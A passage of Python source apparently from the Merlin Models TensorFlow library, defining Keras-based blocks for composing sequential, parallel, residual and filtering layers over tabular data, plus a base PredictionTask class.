) -> "SequentialBlock":
"""Connect the block to other blocks sequentially with a residual connection.
Parameters
----------
block: Union[tf.keras.layers.Layer, str]
Blocks to connect to.
activation: str
Activation to use for the residual connection.
"""
_block = self.parse(block)
residual_block = ResidualBlock(_block, activation=activation)
if isinstance(self, SequentialBlock):
self.layers.append(residual_block)
return self
return SequentialBlock([self, residual_block], copy_layers=False)
def connect_with_shortcut(
self,
block: Union[tf.keras.layers.Layer, str],
shortcut_filter: Optional["Filter"] = None,
post: Optional[BlockType] = None,
aggregation: Optional["TabularAggregationType"] = None,
block_outputs_name: Optional[str] = None,
) -> "SequentialBlock":
"""Connect the block to other blocks sequentially with a shortcut connection.
Parameters
----------
block: Union[tf.keras.layers.Layer, str]
Blocks to connect to.
shortcut_filter: Filter
Filter to use for the shortcut connection.
post: Block
Block to use as post-transformation.
aggregation: TabularAggregationType
Aggregation to apply to the outputs.
block_outputs_name: str
Name of the block outputs.
"""
_block = self.parse(block) if not isinstance(block, Block) else block
residual_block = WithShortcut(
_block,
shortcut_filter=shortcut_filter,
post=post,
aggregation=aggregation,
block_outputs_name=block_outputs_name,
)
if isinstance(self, SequentialBlock):
self.layers.append(residual_block)
return self
return SequentialBlock([self, residual_block], copy_layers=False)
def connect_debug_block(self, append=True):
"""Connect the block to a debug block.
Parameters
----------
append: bool
Whether to append the debug block to the block or to prepend it.
"""
if not append:
return SequentialBlock([Debug(), self])
return self.connect(Debug())
def connect_branch(
self,
*branches: Union["Block", "PredictionTask", str],
add_rest=False,
post: Optional[BlockType] = None,
aggregation: Optional["TabularAggregationType"] = None,
**kwargs,
) -> Union["SequentialBlock", "Model", "RetrievalModel"]:
"""Connect the block to one or multiple branches.
Parameters
----------
branches: Union[Block, PredictionTask, str]
Blocks to connect to.
add_rest: bool
Whether to add the rest of the block to the branches.
post: Block
Block to use as post-transformation.
aggregation: TabularAggregationType
Aggregation to apply to the outputs.
"""
branches = [self.parse(b) for b in branches]
all_features = []
for branch in branches:
if getattr(branch, "set_schema", None):
branch.set_schema(self.schema)
if isinstance(branch, SequentialBlock):
filter_features = branch.filter_features
if filter_features:
all_features.extend(filter_features)
if add_rest:
rest_features = self.schema.without(list(set([str(f) for f in all_features])))
rest_block = SequentialBlock([Filter(rest_features)])
branches.append(rest_block)
if all(isinstance(branch, ModelLikeBlock) for branch in branches):
parallel = ParallelPredictionBlock(
*branches, post=post, aggregation=aggregation, **kwargs
)
return Model(SequentialBlock([self, parallel]))
return SequentialBlock(
[self, ParallelBlock(*branches, post=post, aggregation=aggregation, **kwargs)]
)
def select_by_name(self, name: str) -> Optional["Block"]:
if name == self.name:
return self
return None
def copy(self):
return self.from_config(self.get_config())
def _maybe_propagate_context(self, input_shapes):
if getattr(self, "_context", None) and not self.context.built:
for module in self.submodules:
if hasattr(module, "_set_context") and not getattr(module, "context", False):
module._set_context(self.context)
if hasattr(module, "add_features_to_context") and not getattr(
module, "_features_registered", False
):
feature_names = module.add_features_to_context(input_shapes)
module._features_registered = True
if feature_names:
self.context.add_features(*feature_names)
self._need_to_call_context = True
self.context.build(input_shapes)
def __rrshift__(self, other):
return right_shift_layer(self, other)
@tf.keras.utils.register_keras_serializable(package="merlin.models")
class SequentialBlock(Block):
"""The SequentialLayer represents a sequence of Keras layers.
It is a Keras Layer that can be used instead of tf.keras.layers.Sequential,
which is actually a Keras Model. In contrast to keras Sequential, this
layer can be used as a pure Layer in tf.functions and when exporting
SavedModels, without having to pre-declare input and output shapes. In turn,
this layer is usable as a preprocessing layer for TF Agents Networks, and
can be exported via PolicySaver.
Usage::
c = SequentialLayer([layer1, layer2, layer3])
output = c(inputs) # Equivalent to: output = layer3(layer2(layer1(inputs)))
"""
def __init__(
self,
*layers,
filter: Optional[Union[Schema, Tags, List[str], "Filter"]] = None,
pre_aggregation: Optional["TabularAggregationType"] = None,
block_name: Optional[str] = None,
copy_layers: bool = False,
**kwargs,
):
"""Create a composition.
Parameters
----------
layers:
A list or tuple of layers to compose.
**kwargs:
Arguments to pass to `Keras` layer initializer, including `name`.
Raises
------
TypeError:
If any of the layers are not instances of keras `Layer`.
"""
if len(layers) == 1 and isinstance(layers[0], (list, tuple)):
layers = layers[0]
self.block_name = block_name
if pre_aggregation:
layers = [TabularBlock(aggregation=pre_aggregation), *layers]
for layer in layers:
if not isinstance(layer, tf.keras.layers.Layer):
raise TypeError(
"Expected all layers to be instances of keras Layer, but saw: '{}'".format(
layer
)
)
super(SequentialBlock, self).__init__(**kwargs)
if getattr(layers[0], "schema", None):
super().set_schema(layers[0].schema)
layers = copy.copy(layers) if copy_layers else layers
if filter:
if not isinstance(filter, Filter):
filter = Filter(filter)
self.layers = [filter, *layers]
else:
self.layers = layers
def compute_output_shape(self, input_shape):
output_shape = input_shape
for layer in self.layers:
output_shape = layer.compute_output_shape(output_shape)
return output_shape
def compute_output_signature(self, input_signature):
output_signature = input_signature
for layer in self.layers:
output_signature = layer.compute_output_signature(output_signature)
return output_signature
def build(self, input_shape=None):
self._maybe_propagate_context(input_shape)
last_layer = None
for layer in self.layers:
try:
layer.build(input_shape)
except TypeError:
t, v, tb = sys.exc_info()
if isinstance(input_shape, dict) and isinstance(last_layer, TabularBlock):
v = TypeError(
f"Couldn't build {layer}, "
f"did you forget to add aggregation to {last_layer}?"
)
six.reraise(t, v, tb)
input_shape = layer.compute_output_shape(input_shape)
last_layer = layer
self.built = True
def set_schema(self, schema=None):
for layer in self.layers:
self._maybe_set_schema(layer, schema)
return super().set_schema(schema)
def _get_name(self):
return self.block_name if self.block_name else f"{self.__class__.__name__}"
@property
def inputs(self):
first = list(self)[0]
if isinstance(first, SequentialBlock):
return first.inputs
if is_input_block(first):
return first
@property
def first(self):
return self.layers[0]
@property
def last(self):
return self.layers[-1]
@property
def filter_features(self) -> List[str]:
if isinstance(self.layers[0], Filter):
return self.layers[0].feature_names
elif isinstance(self.layers[0], SequentialBlock):
return self.layers[0].filter_features
return []
@property
def trainable_weights(self):
if not self.trainable:
return []
weights = {}
for layer in self.layers:
for v in layer.trainable_weights:
weights[id(v)] = v
return list(weights.values())
@property
def non_trainable_weights(self):
weights = {}
for layer in self.layers:
for v in layer.non_trainable_weights:
weights[id(v)] = v
return list(weights.values())
@property
def trainable(self):
return all(layer.trainable for layer in self.layers)
@trainable.setter
def trainable(self, value):
for layer in self.layers:
layer.trainable = value
@property
def losses(self):
values = set()
for layer in self.layers:
values.update(layer.losses)
return list(values)
@property
def regularizers(self):
values = set()
for layer in self.layers:
values.update(layer.regularizers)
return list(values)
def call(self, inputs, training=False, **kwargs):
if getattr(self, "_need_to_call_context", False):
self.context(inputs)
outputs = inputs
for i, layer in enumerate(self.layers):
if i == len(self.layers) - 1:
filtered_kwargs = filter_kwargs(kwargs, layer, filter_positional_or_keyword=False)
else:
filtered_kwargs = filter_kwargs(
dict(training=training), layer, filter_positional_or_keyword=False
)
outputs = layer(outputs, **filtered_kwargs)
return outputs
def compute_loss(self, inputs, targets, **kwargs):
outputs, targets = inputs, targets
for layer in self.layers:
outputs, targets = layer.compute_loss(outputs, targets=targets, **kwargs)
return outputs, targets
def call_targets(self, predictions, targets, training=False, **kwargs):
outputs = targets
for layer in self.layers:
if isinstance(outputs, (list, tuple)) and len(outputs) > 0:
outputs, predictions = outputs
outputs = layer.call_targets(predictions, outputs, training=training, **kwargs)
return outputs
def get_config(self):
config = {}
for i, layer in enumerate(self.layers):
config[i] = tf.keras.utils.serialize_keras_object(layer)
return config
def __getitem__(self, key):
return self.layers[key]
@property
def is_tabular(self):
return getattr(self.layers[-1], "is_tabular", False)
@classmethod
def from_config(cls, config, custom_objects=None):
layers = [
tf.keras.layers.deserialize(conf, custom_objects=custom_objects)
for conf in config.values()
]
return SequentialBlock(layers)
def __rrshift__(self, other):
return right_shift_layer(self, other)
def __rshift__(self, other):
# pylint: disable=arguments-out-of-order
return right_shift_layer(other, self)
tabular_aggregation_registry: Registry = Registry.class_registry("tf.tabular_aggregations")
class TabularAggregation(
SchemaMixin, tf.keras.layers.Layer, RegistryMixin["TabularAggregation"], abc.ABC
):
registry = tabular_aggregation_registry
"""Aggregation of `TabularData` that outputs a single `Tensor`"""
def call(self, inputs: TabularData, **kwargs) -> tf.Tensor:
raise NotImplementedError()
def _expand_non_sequential_features(self, inputs: TabularData) -> TabularData:
inputs_sizes = {k: v.shape for k, v in inputs.items()}
seq_features_shapes, sequence_length = self._get_seq_features_shapes(inputs_sizes)
if len(seq_features_shapes) > 0:
non_seq_features = set(inputs.keys()).difference(set(seq_features_shapes.keys()))
for fname in non_seq_features:
# Including the 2nd dim and repeating for the sequence length
inputs[fname] = tf.tile(tf.expand_dims(inputs[fname], 1), (1, sequence_length, 1))
return inputs
def _get_seq_features_shapes(self, inputs_sizes: Dict[str, tf.TensorShape]):
seq_features_shapes = dict()
for fname, fshape in inputs_sizes.items():
# Saves the shapes of sequential features
if len(fshape) >= 3:
seq_features_shapes[fname] = tuple(fshape[:2])
sequence_length = 0
if len(seq_features_shapes) > 0:
if len(set(seq_features_shapes.values())) > 1:
raise ValueError(
"All sequential features must share the same shape in the first two dims "
"(batch_size, seq_length): {}".format(seq_features_shapes)
)
sequence_length = list(seq_features_shapes.values())[0][1]
return seq_features_shapes, sequence_length
def _check_concat_shapes(self, inputs: TabularData):
input_sizes = {k: v.shape for k, v in inputs.items()}
if len(set([tuple(v[:-1]) for v in input_sizes.values()])) > 1:
raise Exception(
"All features dimensions except the last one must match: {}".format(input_sizes)
)
def _get_agg_output_size(self, input_size, agg_dim, axis=-1):
batch_size = calculate_batch_size_from_input_shapes(input_size)
seq_features_shapes, sequence_length = self._get_seq_features_shapes(input_size)
if len(seq_features_shapes) > 0:
return batch_size, sequence_length, agg_dim
return tf.TensorShape((batch_size, agg_dim))
def get_values(self, inputs: TabularData) -> List[tf.Tensor]:
values = []
for value in inputs.values():
if type(value) is dict:
values.extend(self.get_values(value)) # type: ignore
else:
values.append(value)
return values
TabularAggregationType = Union[str, TabularAggregation]
TABULAR_MODULE_PARAMS_DOCSTRING = """
pre: Union[str, TabularTransformation, List[str], List[TabularTransformation]], optional
Transformations to apply on the inputs when the module is called (so **before** `call`).
post: Union[str, TabularTransformation, List[str], List[TabularTransformation]], optional
Transformations to apply on the inputs after the module is called (so **after** `call`).
aggregation: Union[str, TabularAggregation], optional
Aggregation to apply after processing the `call`-method to output a single Tensor.
Next to providing a class that extends TabularAggregation, it's also possible to provide
the name that the class is registered in the `tabular_aggregation_registry`. Out of the box
this contains: "concat", "stack", "element-wise-sum" &
"element-wise-sum-item-multi".
schema: Optional[DatasetSchema]
DatasetSchema containing the columns used in this block.
name: Optional[str]
Name of the layer.
"""
@docstring_parameter(tabular_module_parameters=TABULAR_MODULE_PARAMS_DOCSTRING)
@tf.keras.utils.register_keras_serializable(package="merlin.models")
class TabularBlock(Block):
"""Layer that's specialized for tabular-data by integrating many often used operations.
Note, when extending this class, typically you want to overwrite the `compute_call_output_shape`
method instead of the normal `compute_output_shape`. This because a Block can contain pre- and
post-processing and the output-shapes are handled automatically in `compute_output_shape`. The
output of `compute_call_output_shape` should be the shape that's outputted by the `call`-method.
Parameters
----------
{tabular_module_parameters}
"""
def __init__(
self,
pre: Optional[BlockType] = None,
post: Optional[BlockType] = None,
aggregation: Optional[TabularAggregationType] = None,
schema: Optional[Schema] = None,
name: Optional[str] = None,
is_input: bool = False,
**kwargs,
):
super().__init__(name=name, **kwargs)
self.input_size = None
self.set_pre(pre)
self.set_post(post)
self.set_aggregation(aggregation)
self._is_input = is_input
if schema:
self.set_schema(schema)
@property
def is_input(self) -> bool:
return self._is_input
@classmethod
def from_schema(
cls, schema: Schema, tags=None, allow_none=True, **kwargs
) -> Optional["TabularBlock"]:
"""Instantiate a TabularLayer instance from a DatasetSchema.
Parameters
----------
schema
tags
kwargs
Returns
-------
Optional[TabularModule]
"""
schema_copy = copy.copy(schema)
if tags:
schema_copy = schema_copy.select_by_tag(tags)
if not schema_copy.column_names and not allow_none:
raise ValueError(f"No features with tags: {tags} found")
if not schema_copy.column_names:
return None
return cls.from_features(schema_copy.column_names, schema=schema_copy, **kwargs)
@classmethod
@docstring_parameter(tabular_module_parameters=TABULAR_MODULE_PARAMS_DOCSTRING, extra_padding=4)
def from_features(
cls,
features: List[str],
pre: Optional[BlockType] = None,
post: Optional[BlockType] = None,
aggregation: Optional[TabularAggregationType] = None,
name=None,
**kwargs,
) -> "TabularBlock":
"""
Initializes a TabularLayer instance where the contents of features will be filtered out
Parameters
----------
features: List[str]
A list of feature-names that will be used as the first pre-processing op to filter out
all other features not in this list.
{tabular_module_parameters}
Returns
-------
TabularModule
"""
pre = [Filter(features), pre] if pre else Filter(features) # type: ignore
return cls(pre=pre, post=post, aggregation=aggregation, name=name, **kwargs)
def pre_call(
self, inputs: TabularData, transformations: Optional[BlockType] = None
) -> TabularData:
"""Method that's typically called before the forward method for pre-processing.
Parameters
----------
inputs: TabularData
input-data, typically the output of the forward method.
transformations: TabularTransformationsType, optional
Returns
-------
TabularData
"""
return self._maybe_apply_transformations(
inputs, transformations=transformations or self.pre
)
def call(self, inputs: TabularData, **kwargs) -> TabularData:
return inputs
def post_call(
self,
inputs: TabularData,
transformations: Optional[BlockType] = None,
merge_with: Union["TabularBlock", List["TabularBlock"]] = None,
aggregation: Optional[TabularAggregationType] = None,
) -> TensorOrTabularData:
"""Method that's typically called after the forward method for post-processing.
Parameters
----------
inputs: TabularData
input-data, typically the output of the forward method.
transformations: TabularTransformationType, optional
Transformations to apply on the input data.
merge_with: Union[TabularModule, List[TabularModule]], optional
Other TabularModule's to call and merge the outputs with.
aggregation: TabularAggregationType, optional
Aggregation to aggregate the output to a single Tensor.
Returns
-------
TensorOrTabularData (Tensor when aggregation is set, else TabularData)
"""
_aggregation: Optional[TabularAggregation] = None
if aggregation:
_aggregation = TabularAggregation.parse(aggregation)
_aggregation = _aggregation or getattr(self, "aggregation", None)
outputs = inputs
if merge_with:
if not isinstance(merge_with, list):
merge_with = [merge_with]
for layer_or_tensor in merge_with:
to_add = layer_or_tensor(inputs) if callable(layer_or_tensor) else layer_or_tensor
outputs.update(to_add)
outputs = self._maybe_apply_transformations(
outputs, transformations=transformations or self.post
)
if _aggregation:
schema = getattr(self, "schema", None)
_aggregation.set_schema(schema)
return _aggregation(outputs)
return outputs
def __call__( # type: ignore
self,
inputs: TabularData,
*args,
pre: Optional[BlockType] = None,
post: Optional[BlockType] = None,
merge_with: Union["TabularBlock", List["TabularBlock"]] = None,
aggregation: Optional[TabularAggregationType] = None,
**kwargs,
) -> TensorOrTabularData:
"""We overwrite the call method in order to be able to do pre- and post-processing.
Parameters
----------
inputs: TabularData
Input TabularData.
pre: TabularTransformationsType, optional
Transformations to apply before calling the forward method. If pre is None, this method
will check if `self.pre` is set.
post: TabularTransformationsType, optional
Transformations to apply after calling the forward method. If post is None, this method
will check if `self.post` is set.
merge_with: Union[TabularModule, List[TabularModule]]
Other TabularModule's to call and merge the outputs with.
aggregation: TabularAggregationType, optional
Aggregation to aggregate the output to a single Tensor.
Returns
-------
TensorOrTabularData (Tensor when aggregation is set, else TabularData)
"""
inputs = self.pre_call(inputs, transformations=pre)
# This will call the `call` method implemented by the super class.
outputs = super().__call__(inputs, *args, **kwargs) # noqa
if isinstance(outputs, dict):
outputs = self.post_call(
outputs, transformations=post, merge_with=merge_with, aggregation=aggregation
)
return outputs
def _maybe_apply_transformations(
self,
inputs: TabularData,
transformations: Optional[BlockType] = None,
) -> TabularData:
"""Apply transformations to the inputs if these are defined.
Parameters
----------
inputs
transformations
Returns
-------
"""
if transformations:
transformations = Block.parse(transformations)
return transformations(inputs)
return inputs
def compute_call_output_shape(self, input_shapes):
return input_shapes
def compute_output_shape(self, input_shapes):
if self.pre:
input_shapes = self.pre.compute_output_shape(input_shapes)
output_shapes = self._check_post_output_size(self.compute_call_output_shape(input_shapes))
return output_shapes
def build(self, input_shapes):
super().build(input_shapes)
output_shapes = input_shapes
if self.pre:
self.pre.build(input_shapes)
output_shapes = self.pre.compute_output_shape(input_shapes)
output_shapes = self.compute_call_output_shape(output_shapes)
if isinstance(output_shapes, dict):
if self.post:
self.post.build(output_shapes)
output_shapes = self.post.compute_output_shape(output_shapes)
if self.aggregation:
schema = getattr(self, "schema", None)
self.aggregation.set_schema(schema)
self.aggregation.build(output_shapes)
def get_config(self):
config = super(TabularBlock, self).get_config()
config = maybe_serialize_keras_objects(self, config, ["pre", "post", "aggregation"])
if self.schema:
config["schema"] = schema_to_tensorflow_metadata_json(self.schema)
return config
@property
def is_tabular(self) -> bool:
return True
@classmethod
def from_config(cls, config):
config = maybe_deserialize_keras_objects(config, ["pre", "post", "aggregation"])
if "schema" in config:
config["schema"] = tensorflow_metadata_json_to_schema(config["schema"])
return super().from_config(config)
def _check_post_output_size(self, input_shapes):
output_shapes = input_shapes
if isinstance(output_shapes, dict):
if self.post:
output_shapes = self.post.compute_output_shape(output_shapes)
if self.aggregation:
schema = getattr(self, "schema", None)
self.aggregation.set_schema(schema)
output_shapes = self.aggregation.compute_output_shape(output_shapes)
return output_shapes
def apply_to_all(self, inputs, columns_to_filter=None):
if columns_to_filter:
inputs = Filter(columns_to_filter)(inputs)
outputs = tf.nest.map_structure(self, inputs)
return outputs
def set_schema(self, schema=None):
self._maybe_set_schema(self.pre, schema)
self._maybe_set_schema(self.post, schema)
self._maybe_set_schema(self.aggregation, schema)
return super().set_schema(schema)
def set_pre(self, value: Optional[BlockType]):
self._pre = Block.parse(value) if value else None
@property
def pre(self) -> Optional[Block]:
"""
Returns
-------
SequentialTabularTransformations, optional
"""
return self._pre
@property
def post(self) -> Optional[Block]:
"""
Returns
-------
SequentialTabularTransformations, optional
"""
return self._post
def set_post(self, value: Optional[BlockType]):
self._post = Block.parse(value) if value else None
@property
def aggregation(self) -> Optional[TabularAggregation]:
"""
Returns
-------
TabularAggregation, optional
"""
return self._aggregation
def set_aggregation(self, value: Optional[Union[str, TabularAggregation]]):
"""
Parameters
----------
value
"""
if value:
self._aggregation: Optional[TabularAggregation] = TabularAggregation.parse(value)
else:
self._aggregation = None
def repr_ignore(self):
return []
def repr_extra(self):
return []
def repr_add(self):
return []
@staticmethod
def calculate_batch_size_from_input_shapes(input_shapes):
return calculate_batch_size_from_input_shapes(input_shapes)
def __rrshift__(self, other):
return right_shift_layer(self, other)
@tf.keras.utils.register_keras_serializable(package="merlin.models")
class Filter(TabularBlock):
"""Transformation that filters out certain features from `TabularData`."
Parameters
----------
to_include: List[str]
List of features to include in the result of calling the module
pop: bool
Boolean indicating whether to pop the features to exclude from the inputs dictionary.
"""
@overload
def __init__(
self,
inputs: Schema,
name=None,
pop=False,
exclude=False,
add_to_context: bool = False,
**kwargs,
):
...
@overload
def __init__(
self,
inputs: Tags,
name=None,
pop=False,
exclude=False,
add_to_context: bool = False,
**kwargs,
):
...
@overload
def __init__(
self,
inputs: Sequence[str],
name=None,
pop=False,
exclude=False,
add_to_context: bool = False,
**kwargs,
):
...
def __init__(
self, inputs, name=None, pop=False, exclude=False, add_to_context: bool = False, **kwargs
):
if isinstance(inputs, Tags):
self.feature_names = inputs
else:
self.feature_names = list(inputs.column_names) if isinstance(inputs, Schema) else inputs
super().__init__(name=name, **kwargs)
self.exclude = exclude
self.pop = pop
self.add_to_context = add_to_context
def set_schema(self, schema=None):
out = super().set_schema(schema)
if isinstance(self.feature_names, Tags):
self.feature_names = self.schema.select_by_tag(self.feature_names).column_names
return out
def call(self, inputs: TabularData, **kwargs) -> TabularData:
"""Filter out features from inputs.
Parameters
----------
inputs: TabularData
Input dictionary containing features to filter.
Returns Filtered TabularData that only contains the feature-names in `self.to_include`.
-------
"""
assert isinstance(inputs, dict), "Inputs needs to be a dict"
outputs = {k: v for k, v in inputs.items() if self.check_feature(k)}
if self.pop:
for key in outputs.keys():
inputs.pop(key)
if self.add_to_context:
self.context.tensors.update(outputs)
return {}
return outputs
def compute_call_output_shape(self, input_shape):
if self.add_to_context:
return {}
outputs = {k: v for k, v in input_shape.items() if self.check_feature(k)}
return outputs
def check_feature(self, feature_name) -> bool:
if self.exclude:
return feature_name not in self.feature_names
return feature_name in self.feature_names
def get_config(self):
config = super().get_config()
config["inputs"] = self.feature_names
config["exclude"] = self.exclude
config["pop"] = self.pop
return config
# @classmethod
# def from_config(cls, config):
# config = maybe_deserialize_keras_objects(config, ["pre", "post", "aggregation"])
# if "schema" in config:
# config["schema"] = Schema().from_json(config["schema"])
#
# return cls(config.pop(""), **config)
@tf.keras.utils.register_keras_serializable(package="merlin.models")
class ParallelBlock(TabularBlock):
"""Merge multiple layers or TabularModule's into a single output of TabularData.
Parameters
----------
blocks_to_merge: Union[TabularModule, Dict[str, TabularBlock]]
TabularBlocks to merge into, this can also be one or multiple dictionaries keyed by the
name the module should have.
{tabular_module_parameters}
"""
def __init__(
self,
*inputs: Union[tf.keras.layers.Layer, Dict[str, tf.keras.layers.Layer]],
pre: Optional[BlockType] = None,
post: Optional[BlockType] = None,
aggregation: Optional[TabularAggregationType] = None,
schema: Optional[Schema] = None,
name: Optional[str] = None,
strict: bool = False,
**kwargs,
):
super().__init__(
pre=pre, post=post, aggregation=aggregation, schema=schema, name=name, **kwargs
)
self.strict = strict
self.parallel_layers: Union[List[TabularBlock], Dict[str, TabularBlock]]
if all(isinstance(x, dict) for x in inputs):
to_merge: Dict[str, tf.keras.layers.Layer] = reduce(
lambda a, b: dict(a, **b), inputs
) # type: ignore
parsed_to_merge: Dict[str, TabularBlock] = {}
for key, val in to_merge.items():
parsed_to_merge[key] = val
self.parallel_layers = parsed_to_merge
elif all(isinstance(x, tf.keras.layers.Layer) for x in inputs):
parsed: List[TabularBlock] = []
for i, inp in enumerate(inputs):
parsed.append(inp)
self.parallel_layers = parsed
else:
raise ValueError(
"Please provide one or multiple layer's to merge or "
f"dictionaries of layer. got: {inputs}"
)
# Merge schemas if necessary.
if not schema and all(getattr(m, "schema", False) for m in self.parallel_values):
if len(self.parallel_values) == 1:
self.set_schema(self.parallel_values[0].schema)
else:
s = reduce(
lambda a, b: a + b, [m.schema for m in self.parallel_values]
) # type: ignore
self.set_schema(s)
@property
def parallel_values(self) -> List[tf.keras.layers.Layer]:
if isinstance(self.parallel_layers, dict):
return list(self.parallel_layers.values())
return self.parallel_layers
@property
def parallel_dict(self) -> Dict[str, tf.keras.layers.Layer]:
if isinstance(self.parallel_layers, dict):
return self.parallel_layers
return {str(i): m for i, m in enumerate(self.parallel_layers)}
def select_by_name(self, name: str) -> Optional["Block"]:
return self.parallel_dict.get(name)
def __getitem__(self, key) -> "Block":
return self.parallel_dict[key]
def __setitem__(self, key: str, item: "Block"):
self.parallel_dict[key] = item
def add_branch(self, name: str, block: "Block") -> "ParallelBlock":
if isinstance(self.parallel_layers, dict):
self.parallel_layers[name] = block
return self
def apply_to_branch(self, branch_name: str, *block: "Block"):
if isinstance(self.parallel_layers, dict):
self.parallel_layers[branch_name] = self.parallel_layers[branch_name].apply(*block)
def call(self, inputs, **kwargs):
if self.strict:
assert isinstance(inputs, dict), "Inputs needs to be a dict"
if getattr(self, "_need_to_call_context", False):
self.context(inputs)
outputs = {}
if isinstance(inputs, dict) and all(
name in inputs for name in list(self.parallel_dict.keys())
):
for name, block in self.parallel_dict.items():
out = block(inputs[name])
if not isinstance(out, dict):
out = {name: out}
outputs.update(out)
else:
for name, layer in self.parallel_dict.items():
out = layer(inputs)
if not isinstance(out, dict):
out = {name: out}
outputs.update(out)
return outputs
def compute_call_output_shape(self, input_shape):
output_shapes = {}
for name, layer in self.parallel_dict.items():
if isinstance(input_shape, dict) and all(
key in input_shape for key in list(self.parallel_dict.keys())
):
out = layer.compute_output_shape(input_shape[name])
else:
out = layer.compute_output_shape(input_shape)
if isinstance(out, dict):
output_shapes.update(out)
else:
output_shapes[name] = out
return output_shapes
def build(self, input_shape):
if isinstance(input_shape, dict) and all(
name in input_shape for name in list(self.parallel_dict.keys())
):
for key, block in self.parallel_dict.items():
block.build(input_shape[key])
else:
for layer in self.parallel_values:
layer.build(input_shape)
return super().build(input_shape)
def get_config(self):
return maybe_serialize_keras_objects(
self, super(ParallelBlock, self).get_config(), ["parallel_layers"]
)
@classmethod
def parse_config(cls, config, custom_objects=None):
config = maybe_deserialize_keras_objects(config, ["pre", "post", "aggregation"])
if "schema" in config:
config["schema"] = tensorflow_metadata_json_to_schema(config["schema"])
parallel_layers = config.pop("parallel_layers")
inputs = {
name: tf.keras.layers.deserialize(conf, custom_objects=custom_objects)
for name, conf in parallel_layers.items()
}
return inputs, config
@classmethod
def from_config(cls, config, custom_objects=None):
inputs, config = cls.parse_config(config, custom_objects)
return cls(inputs, **config)
@tf.keras.utils.register_keras_serializable(package="merlin.models")
class AsTabular(tf.keras.layers.Layer):
"""Converts a Tensor to TabularData by converting it to a dictionary.
Parameters
----------
output_name: str
Name that should be used as the key in the output dictionary.
name: str
Name of the layer.
"""
def __init__(self, output_name: str, name=None, **kwargs):
super().__init__(name=name, **kwargs)
self.output_name = output_name
def call(self, inputs, **kwargs):
return {self.output_name: inputs}
def compute_output_shape(self, input_shape):
return {self.output_name: input_shape}
def get_config(self):
config = super(AsTabular, self).get_config()
config["output_name"] = self.output_name
return config
@property
def is_tabular(self) -> bool:
return True
@tf.keras.utils.register_keras_serializable(package="merlin.models")
class NoOp(tf.keras.layers.Layer):
def call(self, inputs, **kwargs):
return inputs
def compute_output_shape(self, input_shape):
return input_shape
@tf.keras.utils.register_keras_serializable(package="merlin.models")
class Debug(tf.keras.layers.Layer):
def call(self, inputs, **kwargs):
return inputs
def compute_output_shape(self, input_shape):
return input_shape
@tf.keras.utils.register_keras_serializable(package="merlin.models")
class WithShortcut(ParallelBlock):
def __init__(
self,
block: Union[tf.keras.layers.Layer, Block],
shortcut_filter: Optional[Filter] = None,
aggregation=None,
post: Optional[BlockType] = None,
schema: Optional[Schema] = None,
name: Optional[str] = None,
strict: bool = False,
block_outputs_name: Optional[str] = None,
**kwargs,
):
block_outputs_name = block_outputs_name or block.name
shortcut = shortcut_filter if shortcut_filter else NoOp()
inputs = {block_outputs_name: block, "shortcut": shortcut}
super().__init__(
inputs,
post=post,
aggregation=aggregation,
schema=schema,
name=name,
strict=strict,
**kwargs,
)
@classmethod
def from_config(cls, config, **kwargs):
output = ParallelBlock.from_config(config, **kwargs)
output.__class__ = cls
return output
@tf.keras.utils.register_keras_serializable(package="merlin.models")
class ResidualBlock(WithShortcut):
def __init__(
self,
block: Union[tf.keras.layers.Layer, Block],
activation=None,
post: Optional[BlockType] = None,
schema: Optional[Schema] = None,
name: Optional[str] = None,
strict: bool = False,
**kwargs,
):
from merlin.models.tf.blocks.aggregation import SumResidual
super().__init__(
block,
post=post,
aggregation=SumResidual(activation=activation),
schema=schema,
name=name,
strict=strict,
**kwargs,
)
class DualEncoderBlock(ParallelBlock):
def __init__(
self,
left: Union[TabularBlock, tf.keras.layers.Layer],
right: Union[TabularBlock, tf.keras.layers.Layer],
pre: Optional[BlockType] = None,
post: Optional[BlockType] = None,
aggregation: Optional[TabularAggregationType] = None,
schema: Optional[Schema] = None,
left_name: str = "left",
right_name: str = "right",
name: Optional[str] = None,
strict: bool = False,
**kwargs,
):
if not getattr(left, "is_tabular", False):
left = SequentialBlock([left, AsTabular(left_name)])
if not getattr(right, "is_tabular", False):
right = SequentialBlock([right, AsTabular(right_name)])
towers = {left_name: left, right_name: right}
super().__init__(
towers,
pre=pre,
post=post,
aggregation=aggregation,
schema=schema,
name=name,
strict=strict,
**kwargs,
)
@classmethod
def from_config(cls, config, **kwargs):
output = ParallelBlock.from_config(config, **kwargs)
output.__class__ = cls
return output
def call_parallel(self, other, aggregation=None, **kwargs):
return ParallelBlock(self, other, aggregation=aggregation, **kwargs)
TabularBlock.__add__ = call_parallel
# TabularBlock.merge = call_parallel
def name_fn(name, inp):
return "/".join([name, inp]) if name else None
MetricOrMetricClass = Union[tf.keras.metrics.Metric, Type[tf.keras.metrics.Metric]]
@dataclass
class EmbeddingWithMetadata:
embeddings: tf.Tensor
metadata: Dict[str, tf.Tensor]
@tf.keras.utils.register_keras_serializable(package="merlin.models")
class PredictionTask(Layer, LossMixin, MetricsMixin, ContextMixin):
"""Base-class for prediction tasks.
Parameters
----------
metrics:
List of Keras metrics to be evaluated.
prediction_metrics:
List of Keras metrics used to summarize the predictions.
label_metrics:
List of Keras metrics used to summarize the labels.
loss_metrics:
List of Keras metrics used to summarize the loss.
name:
Optional task name.
"""
def __init__(
self,
target_name: Optional[str] = None,
task_name: Optional[str] = None,
metrics: Optional[List[MetricOrMetricClass]] = None,
pre: Optional[Block] = None,
task_block: Optional[Layer] = None,
prediction_metrics: Optional[List[tf.keras.metrics.Metric]] = None,
label_metrics: Optional[List[tf.keras.metrics.Metric]] = None,
loss_metrics: Optional[List[tf.keras.metrics.Metric]] = None,
name: Optional[Text] = None,
**kwargs,
) -> None:
super().__init__(name=name, **kwargs)
self.target_name = target_name
self.task_block = task_block
self._task_name = task_name
self.pre = pre
create_metrics = self._create_metrics
self.eval_metrics = create_metrics(metrics) if metrics else []
self.prediction_metrics = create_metrics(prediction_metrics) if prediction_metrics else []
self.label_metrics = create_metrics(label_metrics) if label_metrics else []
self.loss_metrics = create_metrics(loss_metrics) if loss_metrics else []
def pre_call(self, inputs, **kwargs):
x = inputs
if self.task_block:
x = self.task_block(x)
if self.pre:
x = self.pre(inputs, **kwargs)
return x
def pre_loss(self, predictions, targets, **kwargs):
targets = self.pre.call_targets(predictions, targets, **kwargs)
return targets
def __call__(self, *args, **kwargs):
inputs = self.pre_call(*args, **kwargs)
# This will call the `call` method implemented by the super class.
outputs = super().__call__(inputs, **kwargs) # noqa
return outputs
